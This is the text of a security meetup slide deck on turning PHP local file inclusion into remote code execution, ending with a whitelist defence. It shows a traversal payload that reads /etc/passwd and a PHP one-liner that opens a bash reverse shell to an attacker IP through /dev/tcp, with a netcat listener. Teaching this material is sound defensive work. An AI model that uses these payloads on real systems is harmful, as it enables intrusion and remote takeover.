Local File Inclusion to Remote Code Execution

null0x00 11,334 views 13 slides Apr 07, 2014

Slide 1 of 13

About This Presentation

null Bangalore Chapter - March 2014 Meet

Size: 242.54 KB

Language: en

Added: Apr 07, 2014

Slides: 13 pages

Slide Content

Local File Inclusion To Remote
Command Execution [LFI <> RCE]
By
Sharath Unni

Introduction
What is a file inclusion vulnerability?
How the attack works?
RFI/LFI vulnerable PHP functions
Traverse and read local files
Path Traversal / FI using scanners
Reverse shell via LFI
Other ways to inject your code
Defending yourself

What is a file inclusion vulnerability?
Input validation
The application trusts/doesn’t validate the user input

The code includes/imports other pages

Dynamic including of the page
When PHP includes a file it will parse any PHP code within
that file (“<?php” and “?>”)

Do not trust the user…ever !!

How the attack works?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include

The code would be:

<?php $file =$_GET[‘file'];
include("/".$file .".php"); <-- Vulnerable !!
?>

Assign page to "../../../../etc/passwd%00“

<?php $file =$_GET[‘file'];
include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?>

%00 (Null CHAR) will ignore everything that comes after %00
../../../ will traverse path to root and goto /etc/passwd

RFI/LFI vulnerable PHP functions

include()
include_once()
require()
require_once()
fopen()

Common locations
Normally, the following files are read:
/etc/passwd
/etc/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/httpd/conf/httpd.conf

Other Unix common locations

Path Traversal / FI using scanners
http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/

We read the files,
what next?

Reverse shell via LFI
PHP script to open an outbound TCP connection

<?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>

Go and catch the reverse shell

nc –lp <port>

Other ways to inject your code
Using directory traversal to read files
Log poisoning (access.log, error.log)
Session variables
Uploaded files
Emails
Shared hosting
FTP and other logs

Defending yourself
<?php
 $page_files=array( 'about'=>'about.html',
 'photos'=>'photos.html',
 'contact'=>'contact.html',
 'home'=>'home.html'
 );

if (in_array($_GET['page'],array_keys($page_files))) {
 include $page_files[$_GET['page']];
 } else {
 include $page_files['home'];
}
?>

Thank You! 

References
http://sectoolmarket.com/path-traversal-local-file-
inclusion-detection-accuracy-of-open-source-web-
application-scanners.html

Local File Inclusion to Remote Code Execution

About This Presentation

Slide Content

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Local File Inclusion to Remote Code Execution

About This Presentation

Slide Content

Slide 1

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Pray For The Peace Of Jerusalem and You Will Prosper

Don_t_Waste_Your_Life_God.....powerpoint

VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf

Fertility awareness methods for women in the society

Chapter 5 Arithmetic Functions Computer Organisation and Architecture

syakira bhasa inggris (1) (1).pptx.......